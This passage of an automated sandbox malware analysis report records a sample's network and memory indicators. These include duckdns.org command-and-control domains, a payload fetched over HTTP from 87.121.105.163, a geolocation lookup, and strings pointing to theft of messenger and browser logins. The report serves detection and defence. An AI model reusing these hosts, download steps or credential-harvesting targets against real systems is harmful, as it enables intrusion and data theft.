              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeKug source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22C910F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C96580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22C96580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898

              Networking

              Source: Malware configuration extractor URLs: jgbours284hawara01.duckdns.org
              Source: unknown DNS query: name: jgbours284hawara01.duckdns.org
              Source: unknown DNS query: name: jgbours284hawara02.duckdns.org
              Source: global traffic TCP traffic: 192.168.2.5:49731 -> 45.88.90.110:3050
              Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
              Source: Joe Sandbox View IP Address: 45.88.90.110
              Source: Joe Sandbox View IP Address: 239.255.255.250
              Source: Joe Sandbox View IP Address: 87.121.105.163
              Source: Joe Sandbox View ASN Name: LVLT-10753US
              Source: Joe Sandbox View ASN Name: WOWUS
              Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
              Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /Subumbilical.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. 
Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714605232991&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
              Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu
              Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE
              Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Subumbilical.dwpXR
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.108
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: svchost.exe, 00000003.00000002.3226864730.0000021BB3E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv5CE7.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3223807080.0000004D6CC7B000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2743509012.0000021BB3CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
              Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
              Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/i
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp0
              Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpI
              Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp_
              Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gprqDS
              Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv5CE7.tmp.16.dr String found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000010.00000002.2643556229.0000000000682000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000003.00000003.2000735992.0000021BB3CE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
              Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2643041516.00000000029E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.3.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://www.ecosia.org/newtab/
              Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
              Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49734 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

